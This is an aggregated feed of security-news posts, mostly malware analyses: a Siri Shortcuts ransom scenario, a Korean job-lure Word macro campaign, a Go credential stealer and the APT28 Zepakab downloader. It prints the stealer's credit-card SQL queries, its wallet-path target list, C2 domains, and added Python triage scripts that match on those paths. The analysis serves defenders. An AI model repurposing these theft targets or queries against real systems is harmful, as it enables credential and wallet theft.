  2. The Siri Shortcut can message the information to an external party; this data can also be sent over SSH to the attacker’s server using native functionality.
  3. The Shortcut can set the brightness and volume of the device to 100%.
  4. It can turn the device’s flashlight on and off while vibrating at the same time to get the user’s attention and make them believe their device has been taken over.
  5. The Shortcut can be made to speak a ransom note which can include convincing personal details to make the user believe the attacker. For example, it can indicate the IP address and physical address of the person and demand payment.
  6. The Shortcut can be further programmed to then display the spoken note in a written alert format on the device.
  7. To nudge the user to pay up, the Shortcut can be configured to open a webpage, accessing a URL that contains payment information for a cryptocurrency wallet, or a phishing page demanding payment card/account information[1].
  8. To spread around, and since Siri Shortcuts can be shared among users, the malicious Shortcut could also send a link to everyone in the user’s contact list, giving it a “worm-like” capability[2] that’s easy to deploy but harder to detect.

Not Only Ransom

In our security research labs, we tested the ransom attack scenario. The shortcut we created was named “Ransom” in the video, but it could easily be named any other name to entice users to run it. Lures, such as game cheats/hacking, unlocking secret functionality in apps, or getting free money, often entice users to tap on a shortcut and see where it leads.

From our researchers’ experience, users may fall prey to social engineering and end up installing and running malicious code or apps on their devices.

Using Siri Shortcuts More Safely

Siri Shortcuts has its merits and some security concerns to be aware of. Yet, it is possible to use this functionality in a safer manner.

  1. Never install a Shortcut from an untrusted source.
  2. Check the permissions that the shortcut is requesting and never give permission to portions of your phone you are not comfortable with. Things like photos, location and camera could be used to obtain sensitive information.

Siri Shortcut on iOS12

  3. Use the “show actions” button before installing a third-party shortcut to see the underlying actions the shortcut might take. Look for things like messaging data to numbers you don’t recognize, emailing data out, or making SSH connections to remote servers.

Checking permissions for Siri Shortcut

Apple Controls Centralized Patch Control

Siri Shortcuts is a native feature of iOS12; however, in order to utilize custom shortcuts, one must download the Shortcuts app from Apple’s app store. This gives Apple the ability to patch/update the functionality of the Shortcuts app without having to update the entire OS version.

Users Should Be Very Selective with App Permissions

It’s also important to note that using shortcuts is designed for, and therefore requires, a lot of user interaction. First, users must download and install the shortcut from a shared source, and then manually tap it to run it. Users must also grant access to photos, contacts or any other sensitive data the shortcut wants access to.

This is a sharp reminder to validate anything you install on your mobile device, as Shortcuts lets you see everything the script is capable of before installing it. As tempting as it might be to just scroll past that text and hit accept, users must be more aware of good security practices, which include reading and understanding anything they authorize to run on their device.

[1] Not shown in this video

[2] Not shown in this video

The post Hey Siri, Get My Coffee, Hold the Malware appeared first on Security Intelligence.

5 New Year’s Resolutions for Your IoT Security Strategy

A new year has arrived, and with it comes the opportunity to make all kinds of transformations to help your business. No matter how you navigated the dangerous threat landscape

The post 5 New Year’s Resolutions for Your IoT Security Strategy appeared first on The Cyber Security Place.

FBI Mapping ‘Joanap Malware’ Victims to Disrupt the North Korean Botnet

The United States Department of Justice (DoJ) announced Wednesday its effort to "map and further disrupt" a botnet tied to North Korea that has infected numerous Microsoft Windows computers across the globe over the last decade. Dubbed Joanap, the botnet is believed to be part of "Hidden Cobra"—an Advanced Persistent Threat (APT) actors' group often known as Lazarus Group and Guardians of

Fake Cisco Job Posting Targets Korean Candidates


Edmund Brumaghin and Paul Rascagneres authored this post, with contributions from Jungsoo An.

Executive summary


Cisco Talos recently observed a targeted malware campaign being leveraged in an attempt to compromise specific organizations. The infection vector associated with this campaign was a Microsoft Word document that was disguised as a job posting for Cisco Korea, and leveraged legitimate content available as part of job postings on various websites. EST Security also described this campaign in a blog post this week. This malicious Office document appears to have been the initial portion of what was designed to be a multi-stage infection process.

During our analysis of this campaign, we located additional samples that we believe are linked to multiple previous campaigns associated with the same threat actor. Each of the campaigns leveraged malicious documents and initial stage payloads that all featured similar tactics, techniques, and procedures (TTP). Due to the targeted nature of this campaign, the lack of widespread indicator of compromise data, and the apparent nature of the targeting, this appears to be associated with a sophisticated attacker. This sort of attack has become more common as threat actors continue to target users to gain an initial foothold in environments. Organizations are encouraged to employ a defense-in-depth approach to security and disallow the execution of macros where possible.

 

Malicious Office document


The malicious document purports to relate to an employment opportunity with Cisco in Korea with the name "Job Descriptions.doc." The contents of the document match legitimate job descriptions that are available online. Below is a screenshot showing the contents of the decoy document.
The contents of this document appear to be copied from job descriptions that are publicly available online. Here's an example of these documents:
The file metadata associated with the Word document indicates that it may have been created in 2018, but was last saved on Jan. 29, 2019.
The Microsoft Word document contains malicious macros that are responsible for extracting a malicious PE32 executable called "jusched.exe" (the same name as the Java updater binary), which is dropped into %APPDATA%\Roaming. The macro is obfuscated:
The encoded string is a PE32 executable encoded with the XOR key: 0xe7. Below is the decoded value of the variable str(1), which we can identify as a PE header:
The functionality present in the PE32 is described in the next section.

First-stage malware payload


Binary purpose


The PE32 executable attempts to contact the command and control (C2) server over HTTP, presumably to retrieve additional instructions (script or PE32 executable) for execution on the infected system.
Unfortunately, at the time of our analysis, the second-stage payload was no longer available and the HTTP requests resulted in HTTP 404 messages. The domain contacted is a legitimate website that had been compromised and was being used to host malicious content (www[.]secuvision[.]co[.]kr/).

API obfuscation


The attackers hid four specific API calls. The APIs are not listed in the import table, but they are loaded dynamically using GetProcAddress(). The function names are obfuscated to make static analysis more difficult. Here's one example:
We can see the library name (kernel32.dll) but not the function name (3ez7/+r7zuzx/fvt7d8=). The string is decoded by using mathematical byte operations. Below are the decoded APIs:

    3ez7/+r7zuzx/fvt7d8=          -> CreateProcessA()
    2vvy++r7y+zy3f/99vvb8Ors598=  -> DeleteURLCacheEntryA()
    y8zS2vHp8PLx//rK8dj38vvf      -> URLDownloadToFileA()
    y8zS0e778M3q7Pv/898=          -> URLOpenStreamA()

The APIs are linked to the process creation, as well as network communications. We assume the attackers were attempting to hide suspicious APIs from static analysis detection engines that use the import table. The C2 server is listed in plain text, indicating that this functionality was not implemented to thwart manual analysis.

Links to previous campaigns


During our analysis of this campaign, we identified several additional samples that we believe are linked to this campaign.

Case 1


One of these related samples was used in August 2017 and featured the filename "주요 IT 정보보호 및 보안 업체 리스트.zip" ("List of major IT information security and security companies"). The ZIP archive contains an Office document that features the same macros as the original sample, but is responsible for dropping a different PE32 executable. The macros also use the same XOR key as the original sample.
This document describes a list of companies with a summary of their products.

The macros were responsible for dropping a different PE32 executable, that was also called "jusched.exe." The API obfuscation algorithm used in this campaign was the same as the one used in our original sample. Below is a screenshot showing the code execution flow in both samples. On the left is the sample from August 2017. On the right is the sample from January 2019.
The C2 server in this campaign was www[.]syadplus[.]com, which is another legitimate website that was compromised.

The SHA256 of the Office document is: 809b1201b17a77732be3a9f96a25d64c8eb0f7e7a826c6d86bb2b26e12da7b58.

The SHA256 of the PE32 executable is: adfb60104a6399c0b1a6b4e0544cca34df6ecee5339f08f42b52cdfe51e75dc3.

Case 2


The second campaign we identified was observed in November 2017. In this case, the filename was "이력서_자기소개서.xls" ("Resume _ self introduction"). Similar to the previously described campaigns, this document leveraged the same macro execution and XOR key, but was responsible for dropping another PE32 executable.
In this campaign, the malicious document was simply an empty resume template.

The C2 server used in this campaign was ilovesvc[.]com, another example of a legitimate website that had been compromised by the threat actor and used to host malicious content.

The SHA256 of the Office document is: bf27c1631ef64c1e75676375a85d48f8ae97e1ea9a5f67c2beefc02c609fc18b.

The SHA256 of the PE32 is: 1497ab6ddccf91ef7f2cd75ce020bb3bf39979210351deaa6e0025997ddfda5a.

Conclusion


These campaigns demonstrate the increasingly sophisticated nature of attacks that are being leveraged by threat actors attempting to compromise organizations around the world. In this most recent campaign, the attackers took the content of legitimate job postings and used that in an attempt to add legitimacy to the malicious Office documents being delivered to potential victims. The use of the same TTPs across multiple campaigns over a long period demonstrates that this threat actor has been operational for years, and is continuing to operate to achieve their mission objectives. Cisco Talos continues to monitor the global threat landscape to ensure that customers remain protected from these as well as additional attacks that may be observed in the future.

Coverage


Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOCs)


The following IOCs are associated to this campaign:

Malicious Office Documents


7af59922d4c1b4f2d589cb2853afb543b37a1f23da0cf0180a693f9748e05906 (SHA256)
bf27c1631ef64c1e75676375a85d48f8ae97e1ea9a5f67c2beefc02c609fc18b (SHA256)
809b1201b17a77732be3a9f96a25d64c8eb0f7e7a826c6d86bb2b26e12da7b58 (SHA256)

Malicious PE32 Executables


e259aa1de48fd10b7601c4486b841428fbd6cd1a4752cf0d3bbe1799116ae6e6 (SHA256)
cd2e8957a2e980ffb82c04e428fed699865542767b257eb888b6732811814a97 (SHA256)
1497ab6ddccf91ef7f2cd75ce020bb3bf39979210351deaa6e0025997ddfda5a (SHA256)
adfb60104a6399c0b1a6b4e0544cca34df6ecee5339f08f42b52cdfe51e75dc3 (SHA256)

Domains


It is important to note that in all of the campaigns that we observed, the domains being leveraged by the malware were legitimate websites that had been compromised by the threat actor for the purposes of hosting malicious content:

www[.]secuvision[.]co[.]kr
ilovesvc[.]com
www[.]syadplus[.]com

Below is a screenshot showing how AMP can protect customers from this threat.



Analyzing a new stealer written in Golang

Golang (Go) is a relatively new programming language, and it is not common to find malware written in it. However, new variants written in Go are slowly emerging, presenting a challenge to malware analysts. Applications written in this language are bulky and look much different under a debugger from those that are compiled in other languages, such as C/C++.

Recently, a new variant of the Zebrocy malware was observed that was written in Go (detailed analysis available here).

We captured another type of malware written in Go in our lab. This time, it was a pretty simple stealer detected by Malwarebytes as Trojan.CryptoStealer.Go. This post will provide detail on its functionality, but also show methods and tools that can be applied to analyze other malware written in Go.

Analyzed sample

This stealer is detected by Malwarebytes as Trojan.CryptoStealer.Go:

Behavioral analysis

Under the hood, Golang calls the Windows API, and we can trace the calls using typical tools, for example PIN tracers. We see that the malware searches for files under the following paths:

"C:\Users\tester\AppData\Local\Uran\User Data\"
"C:\Users\tester\AppData\Local\Amigo\User\User Data\"
"C:\Users\tester\AppData\Local\Torch\User Data\"
"C:\Users\tester\AppData\Local\Chromium\User Data\"
"C:\Users\tester\AppData\Local\Nichrome\User Data\"
"C:\Users\tester\AppData\Local\Google\Chrome\User Data\"
"C:\Users\tester\AppData\Local\360Browser\Browser\User Data\"
"C:\Users\tester\AppData\Local\Maxthon3\User Data\"
"C:\Users\tester\AppData\Local\Comodo\User Data\"
"C:\Users\tester\AppData\Local\CocCoc\Browser\User Data\"
"C:\Users\tester\AppData\Local\Vivaldi\User Data\"
"C:\Users\tester\AppData\Roaming\Opera Software\"
"C:\Users\tester\AppData\Local\Kometa\User Data\"
"C:\Users\tester\AppData\Local\Comodo\Dragon\User Data\"
"C:\Users\tester\AppData\Local\Sputnik\Sputnik\User Data\"
"C:\Users\tester\AppData\Local\Google (x86)\Chrome\User Data\"
"C:\Users\tester\AppData\Local\Orbitum\User Data\"
"C:\Users\tester\AppData\Local\Yandex\YandexBrowser\User Data\"
"C:\Users\tester\AppData\Local\K-Melon\User Data\"

Those paths point to data stored from browsers. One interesting fact is that one of the paths points to the Yandex browser, which is popular mainly in Russia.

The next searched path is for the desktop:

"C:\Users\tester\Desktop\*"

All files found there are copied to a folder created in %APPDATA%:

The folder “Desktop” contains all the TXT files copied from the Desktop and its sub-folders. Example from our test machine:

After the search is completed, the files are zipped:

We can see this packet being sent to the C&C (cu23880.tmweb.ru/landing.php):

Inside

Golang compiled binaries are usually big, so it’s no surprise that the sample has been packed with UPX to minimize its size. We can unpack it easily with the standard UPX tool. As a result, we get a plain Go binary. The export table reveals the compilation path and some other interesting functions:

Looking at those exports, we can get an idea of the static libraries used inside.

Many of those functions (trampoline-related) can be found in the module sqlite-3: https://github.com/mattn/go-sqlite3/blob/master/callback.go.

Function crosscall2 comes from the Go runtime, and it is related to calling Go from C/C++ applications (https://golang.org/src/cmd/cgo/out.go).

Tools

For the analysis, I used IDA Pro along with the IDAGolangHelper scripts written by George Zaytsev. First, the Go executable has to be loaded into IDA. Then, we can run the script from the menu (File –> Script file). We then see the following menu, giving access to particular features:

First, we need to determine the Golang version (the script offers some helpful heuristics). In this case, it will be Go 1.2. Then, we can rename functions and add standard Go types. After completing those operations, the code looks much more readable. Below, you can see the view of the functions before and after using the scripts.

Before (only the exported functions are named):

After (most of the functions have their names automatically resolved and added):

Many of those functions come from statically linked libraries, so we need to focus primarily on the functions annotated as main_*, which are specific to this particular executable.

Code overview

In the function “main_init”, we can see the modules that will be used in the application:

It is statically linked with the following modules:

Analyzing this function can help us predict the functionality; i.e., looking at the above libraries, we can see that the malware will be communicating over the network, reading SQLite3 databases, and throwing exceptions. Other initializers suggest the use of regular expressions, the zip format, and reading environment variables.

This function is also responsible for initializing and mapping strings. We can see that some of them are first base64 decoded:

In the string initializers, we see references to cryptocurrency wallets.

Ethereum:

Monero:

The main function of Golang binary is annotated “main_main”.

Here, we can see that the application is creating a new directory (using a function os.Mkdir). This is the directory where the found files will be copied.

After that, several Goroutines are started using runtime.newproc. (Goroutines can be used similarly to threads, but they are managed differently. More details can be found here.) Those routines are responsible for searching for the files. Meanwhile, the Sqlite module is used to parse the databases in order to steal data.

Then, the malware zips it all into one package, and finally, the package is uploaded to the C&C.

What was stolen?

To see exactly which data the attacker is interested in, we can look more closely at the functions that perform SQL queries and at the related strings.

Strings in Golang are stored in bulk, in concatenated form:

Later, a single chunk from such a bulk is retrieved on demand. Therefore, seeing from which place in the code each string was referenced is not so easy.

Below is a fragment of the code where an “sqlite3” database is opened (a string of length 7 was retrieved):

Another example: this query was retrieved from the full chunk of strings by a given offset and length:

Let’s take a look at which data those queries were trying to fetch. Fetching the strings referenced by the calls, we can retrieve and list all of them:

select name_on_card, expiration_month, expiration_year, card_number_encrypted, billing_address_id FROM credit_cards
select * FROM autofill_profiles
select email FROM autofill_profile_emails
select number FROM autofill_profile_phone
select first_name, middle_name, last_name, full_name FROM autofill_profile_names

We can see that the browser’s cookie database is queried in search of data related to online transactions: credit card numbers and expiration dates, as well as personal data such as names and email addresses.

The paths to all the files being searched are stored as base64 strings. Many of them are related to cryptocurrency wallets, but we can also find references to the Telegram messenger.

Software\\Classes\\tdesktop.tg\\shell\\open\\command
\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\
\\AppData\\Roaming\\Electrum\\wallets\\default_wallet
\\AppData\\Local\\Torch\\User Data\\
\\AppData\\Local\\Uran\\User Data\\
\\AppData\\Roaming\\Opera Software\\
\\AppData\\Local\\Comodo\\User Data\\
\\AppData\\Local\\Chromium\\User Data\\
\\AppData\\Local\\Chromodo\\User Data\\
\\AppData\\Local\\Kometa\\User Data\\
\\AppData\\Local\\K-Melon\\User Data\\
\\AppData\\Local\\Orbitum\\User Data\\
\\AppData\\Local\\Maxthon3\\User Data\\
\\AppData\\Local\\Nichrome\\User Data\\
\\AppData\\Local\\Vivaldi\\User Data\\
\\AppData\\Roaming\\BBQCoin\\wallet.dat
\\AppData\\Roaming\\Bitcoin\\wallet.dat
\\AppData\\Roaming\\Ethereum\\keystore
\\AppData\\Roaming\\Exodus\\seed.seco
\\AppData\\Roaming\\Franko\\wallet.dat
\\AppData\\Roaming\\IOCoin\\wallet.dat
\\AppData\\Roaming\\Ixcoin\\wallet.dat
\\AppData\\Roaming\\Mincoin\\wallet.dat
\\AppData\\Roaming\\YACoin\\wallet.dat
\\AppData\\Roaming\\Zcash\\wallet.dat
\\AppData\\Roaming\\devcoin\\wallet.dat
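Two analysis steps described above lend themselves to a small script: recovering Go string literals from their concatenated bulk given the (offset, length) pairs referenced by the code, and decoding the base64-stored target paths so they can be matched against known wallet and browser-profile locations. The following Python is an added example written for this article, not code from Malwarebytes or from the stealer; the sample blob and bulk string are constructed here to imitate a Go binary’s read-only data, and the path and marker lists are taken from the article.

```python
import base64
import re
from typing import Iterator, List, Tuple

# Paths the article lists as the stealer's targets (a subset), with the Go
# source escaping removed so they match what the decoded strings contain.
SENSITIVE_PATHS = [
    r"\AppData\Roaming\Bitcoin\wallet.dat",
    r"\AppData\Roaming\Electrum\wallets\default_wallet",
    r"\AppData\Roaming\Exodus\seed.seco",
    r"\AppData\Roaming\Ethereum\keystore",
    r"Software\Classes\tdesktop.tg\shell\open\command",
]
# Substrings that mark browser profiles and wallet files even for paths not listed above.
TARGET_MARKERS = ("wallet.dat", "keystore", "seed.seco", "default_wallet", "User Data", "tdesktop.tg")

# Runs of base64 alphabet long enough to be worth decoding (16+ chars, optional padding).
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")


def find_base64_strings(blob: bytes) -> Iterator[Tuple[int, str]]:
    """Yield (offset, text) for each base64 run in blob that decodes to printable ASCII."""
    for m in B64_RUN.finditer(blob):
        token = m.group(0)
        token += b"=" * (-len(token) % 4)  # re-pad runs whose '=' were stripped
        try:
            text = base64.b64decode(token, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            yield m.start(), text


def flag_targets(blob: bytes) -> List[Tuple[int, str, str]]:
    """Decode every base64 string in blob and label those that reveal data-theft targets."""
    hits = []
    for offset, text in find_base64_strings(blob):
        if text in SENSITIVE_PATHS or any(marker in text for marker in TARGET_MARKERS):
            hits.append((offset, "filesystem-target", text))
        elif re.match(r"(?i)select\b.*\bfrom\b", text):
            hits.append((offset, "sql-query", text))
    return hits


def slice_bulk_strings(bulk: bytes, refs: List[Tuple[int, int]]) -> List[str]:
    """Go stores string literals concatenated; code references (pointer, length) pairs.
    Given the concatenated blob and the (offset, length) pairs read from the
    disassembly, recover the individual strings."""
    return [bulk[off:off + length].decode() for off, length in refs]


# --- constructed sample data (not bytes from the real sample) ---------------
def _b64(text: str) -> bytes:
    return base64.b64encode(text.encode())


# Imitates a Go binary's read-only data: symbol names and a few encoded strings.
SAMPLE_BLOB = (
    b"\x00runtime.newproc\x00"
    + _b64(r"\AppData\Roaming\Bitcoin\wallet.dat")
    + b"\x00os.Mkdir\x00"
    + _b64(r"\AppData\Roaming\Exodus\seed.seco")
    + b"\x00"
    + _b64("select email FROM autofill_profile_emails")
    + b"\x00sqlite3\x00QUJD\x00"  # 'QUJD' is valid base64 but too short to be decoded
)

# A Go-style bulk string with two (offset, length) references recovered from the code.
SAMPLE_BULK = b"sqlite3select email FROM autofill_profile_emails"
SAMPLE_REFS = [(0, 7), (7, 41)]

if __name__ == "__main__":
    for offset, kind, text in flag_targets(SAMPLE_BLOB):
        print(f"{offset:#06x} {kind:18} {text}")
    print(slice_bulk_strings(SAMPLE_BULK, SAMPLE_REFS))
```

On a real sample the blob would be the .rdata (or equivalent) section carved from the binary; the minimum run length keeps short symbol names such as “sqlite3” from being decoded as noise, and the printable-ASCII check discards base64-looking runs that are actually code or compressed data.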

Big but unsophisticated malware

Some of the concepts used in this malware remind us of other stealers, such as Evrial, PredatorTheThief, and Vidar. It has similar targets and also sends the stolen data as a ZIP file to the C&C. However, there is no proof that the author of this stealer is somehow linked with those cases.

When we take a look at the implementation as well as the functionality of this malware, it’s rather simple. Its big size comes from the many statically compiled modules. Possibly, this malware is in the early stages of development; its author may have just started learning Go and is experimenting. We will be keeping an eye on its development.

At first, analyzing a Golang-compiled application might feel overwhelming, because of its huge codebase and unfamiliar structure. But with the help of proper tools, security researchers can easily navigate this labyrinth, as all the functions are labeled. Since Golang is a relatively new programming language, we can expect that the tools to analyze it will mature with time.

Is malware written in Go an emerging trend in threat development? It’s a little too soon to tell. But we do know that awareness of malware written in new languages is important for our community.

The post Analyzing a new stealer written in Golang appeared first on Malwarebytes Labs.

Reading the ENISA Threat Landscape Report 2018

According to the ENISA Threat Landscape Report 2018, 2018 has brought significant changes in the techniques, tactics, and procedures associated with cybercrime organizations and nation-state actors.

I’m proud to present you the ENISA Threat Landscape Report 2018, the annual report published by the ENISA ETL group that provides insights on the evolution of the cyber threats in 2018.

ENISA Threat Landscape Report 2018

2018 was characterized by significant changes in the cyber threat landscape, especially in the TTPs associated with threat agent groups. Financially motivated attackers focused their efforts on developing and spreading crypto-miners; this threat appeared in the top 15 threats included in the report.

Nation-state hacking reduced the use of complex malware and appears to go towards low profile social engineering attacks.

“Recent political activities have underlined the emergence of various, quite novel developments in the perceived role of cyberspace for society and national security.” reads the ENISA Threat Landscape Report 2018. “Cyber-diplomacy, cyber-defence and cyberwar regulation have dominated the headlines. These developments, when transposed to actions, are expected to bring new requirements and new use cases for cyberthreat intelligence.”

ENISA experts believe threat actors are going to adapt their activities to the changes introduced to prevent the above interference.

The main trends that emerged in the 2018 cyberthreat landscape are:

  • Mail and phishing messages have become the primary malware infection vector.
  • Exploit Kits have lost their importance in the cyberthreat landscape.
  • Cryptominers have become an important monetization vector for cyber-criminals.
  • State-sponsored agents increasingly target banks by using attack-vectors utilised in cyber-crime.
  • Skill and capability building are the main focus of defenders. Public organisations struggle with staff retention due to strong competition with industry in attracting cybersecurity talents.

The report highlights the importance of cyber threat intelligence in responding to increasingly automated attacks leveraging automated tools and skills. Unfortunately, low-capability organisations and end-users have no access to cyberthreat intelligence solutions, exposing them to severe risk of being hacked.

Another element of concern is the diffusion of IoT devices that are poorly protected.

“The need for generic IoT protection architectures/good practices will remain pressing.” continues the report.

All the above trends are detailed in the ENISA Threat Landscape 2018 (ETL 2018), a must-read for cyber security experts and enthusiasts.

Let me close with the Top Threats 2018; for each threat the report includes detailed information on trends and observed evolution.

Enjoy it!


Pierluigi Paganini

(SecurityAffairs – cybersecurity, ENISA Threat Landscape Report 2018)

The post Reading the ENISA Threat Landscape Report 2018 appeared first on Security Affairs.

Sofacy’s Zepakab Downloader Spotted In-The-Wild

In the last weeks, the Cybaze-Yoroi ZLAB investigated a new APT28 campaign leveraging the Zepakab Downloader.

In the last weeks, the Cybaze-Yoroi ZLAB investigated a new APT28 campaign discovered in January 2019.

The sample has been initially identified by an Italian independent security researcher, who warned the InfoSec community and shared the binary for further analysis.

Cybaze-Yoroi ZLab researchers analyzed this sample to extract indicators and investigate their presence into the Italian landscape.

Technical Analysis

The attack vector is still not clear; APT28 typically uses decoy Office documents armed with VB macros. In any case, the analyzed sample pretends to mimic a Microsoft component called “ServiceTray”.

Sha256: e6e93c7744d20e2cac2c2b257868686c861d43c6cf3de146b8812778c8283f7d
Threat: Zepakab/Zebrocy Downloader
ssdeep: 12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F

At first glance the executable shows it is packed using UPX v3.0 compressor, a widely known tool commonly used to minimize the PE file size.

Figure 1. Info about malicious PE.

Interestingly, the resource section of the executable shows a typical binary pattern of an AutoIt v3 compiled script: the “AUT3!” signature.

Figure 2. Hexadecimal view reporting the AutoIt v3 header.

After the decompilation and the extraction of the script we noticed the script looks simpler than expected: no obfuscation or anti-analysis tricks found.

The usage of the AutoIt language is an emerging characteristic of recent Zepakab downloaders, as also stated by Vitali Kremez, an independent security researcher who compared this sample with the older Zepakab implant version: the behavior and the script structure are very similar, but obviously the new sample uses different command-and-control servers and artifact names.
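The two static indicators the analysis leans on, UPX packing and the AutoIt v3 “AUT3!” resource signature, together with function names from the reused AutoIt libraries named further down (CompInfo.au3 and the WinHttp wrapper), can be turned into a first-pass triage check. The Python below is an added example, not Yoroi’s tooling or anything from the sample; the byte strings it scans are constructed stand-ins for a packed executable and a clean one, and the “_WinHttp” fragment is assumed from the wrapper’s public function naming.

```python
import re
from typing import Dict, List

# "UPX!" and the UPX0/UPX1 section names are what the UPX packer leaves in a packed
# PE; "AUT3!" is the compiled AutoIt v3 script signature quoted in the article.
UPX_MARKERS = (b"UPX!", b"UPX0", b"UPX1")
AUTOIT_SIGNATURE = b"AUT3!"
# Function-name fragments from the reused AutoIt libraries the article names
# (CompInfo.au3's _ComputerGetOSs; the _WinHttp* prefix is assumed for the wrapper).
LIBRARY_HINTS = (b"_computergetoss", b"_winhttp")


def _find_all(data: bytes, needle: bytes, ignore_case: bool = False) -> List[int]:
    """Return every offset at which needle occurs in data."""
    flags = re.IGNORECASE if ignore_case else 0
    return [m.start() for m in re.finditer(re.escape(needle), data, flags)]


def triage_pe(data: bytes) -> Dict[str, object]:
    """Static triage of a PE image; also usable on a carved resource or a decompiled script."""
    report: Dict[str, object] = {
        "is_pe": data[:2] == b"MZ",
        "upx_packed": False,
        "autoit_compiled": False,
        "library_hints": [],
        "indicators": [],  # (marker, offset) pairs for the analyst's notes
    }
    for marker in UPX_MARKERS:
        for off in _find_all(data, marker):
            report["upx_packed"] = True
            report["indicators"].append((marker.decode(), off))
    for off in _find_all(data, AUTOIT_SIGNATURE):
        report["autoit_compiled"] = True
        report["indicators"].append((AUTOIT_SIGNATURE.decode(), off))
    for hint in LIBRARY_HINTS:
        if _find_all(data, hint, ignore_case=True):
            report["library_hints"].append(hint.decode())
    return report


def next_step(report: Dict[str, object]) -> str:
    """Suggest the analyst's next action from the triage flags."""
    if report["upx_packed"] and not report["autoit_compiled"]:
        return "unpack first (upx -d) and re-run: compressed sections can hide the script signature"
    if report["autoit_compiled"]:
        return "extract and decompile the AutoIt script; inspect its C2 URL and payload path"
    return "no packer or AutoIt indicators; continue with standard PE analysis"


# --- constructed sample bytes (not the real binary) -------------------------
SAMPLE_PACKED_AUTOIT = (
    b"MZ\x90\x00" + b"\x00" * 60
    + b"UPX0\x00\x00\x00\x00UPX1\x00\x00\x00\x00"
    + b"\x00" * 16 + b"UPX!" + b"\x00" * 16
    + b"AUT3!" + b"\x00" * 8
    + b"Func _ComputerGetOSs($aOS) ... Func _WinHttpOpen($sUserAgent) ..."
)
SAMPLE_CLEAN = b"MZ\x90\x00" + b"\x00" * 60 + b".text\x00\x00\x00hello world"

if __name__ == "__main__":
    for name, sample in (("packed+autoit", SAMPLE_PACKED_AUTOIT), ("clean", SAMPLE_CLEAN)):
        report = triage_pe(sample)
        print(name, report["upx_packed"], report["autoit_compiled"], report["library_hints"])
        print("  ->", next_step(report))
```

The check is deliberately string-based rather than parsing the PE section table, so it works equally on a whole file, on a resource carved out of it, or on the decompiled script text where the library function names actually live.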

Figure 3. Part of malicious decompiled AutoIt script.

After statically setting some variables, such as the C2 url and the payload path, the script invokes the “argv” function calculating a 32 characters random ID.

Figure 4. Function to craft a 32-chars random ID.

Then it runs the “main” routine, the core of Zepakab. Here the malware implements recon functionalities, retrieves machine information and grabs a screenshot every minute.

Figure 5. AutoIt script’s main function.

Then, all the information is encoded in Base64 and sent to the C2 through the “connect” function, using an SSL-encrypted HTTP channel. Just before sending its message, the malware adds random padding characters, probably to prevent automatic decoding of the message; the final request looks like this:

Figure 6. POST request sent to C2C.

The machine information sent to the C2 is gathered within the “info” function, invoking the “_computergetoss” routine. This last code snippet is likely borrowed from a publicly available AutoIT library script called “CompInfo.au3”: an AutoIt interface to access the Windows Management Instrumentation framework’s data.

Figure 7. Function to retrieve information about victim’s machine.

The code analysis also identified another re-used snippet of script: the AutoIT WinHttp wrapper was included in the malicious sample to enable network communication through the system proxy.

Figure 8. Blog post reporting the Base64 script, shared by a forum user.

Once the communication channel has been established, the command and control analyzes the victim check-in information and, if the compromised machine is likely a target, it sends back the final payload.

The payload will eventually be saved into “C:\ProgramData\Windows\Microsoft\Settings\srhost.exe” and executed inside the “crocodile” function.

Figure 9. The “crocodile” function, used to launch the final payload.

Once the final payload is correctly launched ($cr != 0), the function sets the $call variable to False and the main loop of the script terminates.

Unfortunately, the C2 destination is down at the time of writing, so it was impossible to retrieve the final payload and proceed with in-depth analysis.

Conclusion

Despite its harmful capabilities, the AutoIt Zepakab malware is quite simple and surprisingly does not use any anti-analysis tricks. The Sofacy group borrowed code from publicly available scripts to ease the development of this new weapon in its arsenal and to keep a low profile in terms of TTPs, building a cheap and effective info-stealer able to bypass traditional antivirus almost effortlessly.

CERT-Yoroi assessed no organization part of its constituency has been impacted by this threat.

Further details, including Yara rules and Indicators of compromise (IoCs), are reported in the analysis published on the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Zepakab, APT28)


The post Sofacy’s Zepakab Downloader Spotted In-The-Wild appeared first on Security Affairs.

2019 and Beyond: The (Expanded) RSAC Advisory Board Weighs in on What’s Next: Pt. 2

Part two of the RSA Conference Advisory Board’s look into the future tackles how approaches to cybersecurity must evolve to meet new emerging challenges.

Fighting Emotet: lessons from the front line

Emotet is malware designed to avoid detection, strike hard and multiply. All of this thanks to numerous updates, a polymorphic and modular design, and its ability to carry out different attacks against different victims. So we are facing a changing threat for system administrators. During its five years of life, Emotet […]

Fighting an agile adversary: lessons from the Emotet front

The Emotet malware has staying power and, with constantly new updates, searches particularly perfidiously for gaps in the system. Nevertheless, the fight is not lost: three decisive preventive measures can already help effectively. But first a short digression on the strategy of the cyberattack: the Emotet Trojan specializes in evading protective barriers, striking again and again and […]

Emotet: A veritable Swiss Army knife of malicious capabilities

Formerly just a banking Trojan, Emotet is now one of the most dangerous and multifaceted malware out there. According to Malwarebytes, it and Trickbot are part of the reason why Trojans topped their list of most common business detections in 2018.

Emotet’s capabilities

Emotet’s initial incarnation dates back to 2014 but, in the intervening years, it has become a veritable Swiss Army knife of malicious capabilities. It can: Download additional malware (often Trickbot) Collect information … More

The post Emotet: A veritable Swiss Army knife of malicious capabilities appeared first on Help Net Security.

Malware: Three Industry Problems and How to Solve Them

In the last few years, organizations have been subject to extortion through ransomware. Now, hackers are bypassing the nasty business of trying to get people to give them cryptocurrency and simply hijacking your processor to mine for cryptocurrency. As a result, the methods employed are growing in sophistication and creativity, including using internet memes to […]… Read More

